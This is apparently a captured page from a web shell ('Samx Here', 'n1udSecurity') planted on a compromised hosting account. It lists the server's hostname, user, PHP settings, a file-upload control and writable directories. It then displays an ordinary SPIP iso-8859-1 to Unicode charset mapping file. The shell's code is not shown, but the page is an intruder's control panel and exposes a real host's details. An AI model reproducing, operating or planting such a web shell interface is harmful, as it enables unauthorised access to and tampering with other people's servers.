Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/info/ecrire/charsets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/info/ecrire/charsets/iso-8859-1.php
<?php

/**
 * Déclaration des correspondances entre charsets iso-8859-1 et unicode
 *
 * @package SPIP\Core\Charsets
 **/

$GLOBALS['CHARSET']['iso-8859-1'] = [

// plage invalide en iso-8859-1 mais souvent utilisee quand meme (windows)
// cf. http://openweb.eu.org/articles/caracteres_illegaux/
// voir aussi copie de ces valeurs dans inc/charsets.php
	128 => 8364,
	129 => 129 /* ?? */,
	130 => 8218,
	131 => 402,
	132 => 8222,
	133 => 8230,
	134 => 8224,
	135 => 8225,
	136 => 710,
	137 => 8240,
	138 => 352,
	139 => 8249,
	140 => 338,
	141 => 141 /* ?? */,
	142 => 381,
	143 => 143 /* ?? */,
	144 => 144 /* ?? */,
	145 => 8216,
	146 => 8217,
	147 => 8220,
	148 => 8221,
	149 => 8226,
	150 => 8211,
	151 => 8212,
	152 => 732,
	153 => 8482,
	154 => 353,
	155 => 8250,
	156 => 339,
	157 => 157 /* ?? */,
	158 => 382,
	159 => 376,

	160 => 160,
	161 => 161,
	162 => 162,
	163 => 163,
	164 => 164,
	165 => 165,
	166 => 166,
	167 => 167,
	168 => 168,
	169 => 169,
	170 => 170,
	171 => 171,
	172 => 172,
	173 => 173,
	174 => 174,
	175 => 175,
	176 => 176,
	177 => 177,
	178 => 178,
	179 => 179,
	180 => 180,
	181 => 181,
	182 => 182,
	183 => 183,
	184 => 184,
	185 => 185,
	186 => 186,
	187 => 187,
	188 => 188,
	189 => 189,
	190 => 190,
	191 => 191,
	192 => 192,
	193 => 193,
	194 => 194,
	195 => 195,
	196 => 196,
	197 => 197,
	198 => 198,
	199 => 199,
	200 => 200,
	201 => 201,
	202 => 202,
	203 => 203,
	204 => 204,
	205 => 205,
	206 => 206,
	207 => 207,
	208 => 208,
	209 => 209,
	210 => 210,
	211 => 211,
	212 => 212,
	213 => 213,
	214 => 214,
	215 => 215,
	216 => 216,
	217 => 217,
	218 => 218,
	219 => 219,
	220 => 220,
	221 => 221,
	222 => 222,
	223 => 223,
	224 => 224,
	225 => 225,
	226 => 226,
	227 => 227,
	228 => 228,
	229 => 229,
	230 => 230,
	231 => 231,
	232 => 232,
	233 => 233,
	234 => 234,
	235 => 235,
	236 => 236,
	237 => 237,
	238 => 238,
	239 => 239,
	240 => 240,
	241 => 241,
	242 => 242,
	243 => 243,
	244 => 244,
	245 => 245,
	246 => 246,
	247 => 247,
	248 => 248,
	249 => 249,
	250 => 250,
	251 => 251,
	252 => 252,
	253 => 253,
	254 => 254,
	255 => 255

];

SAMX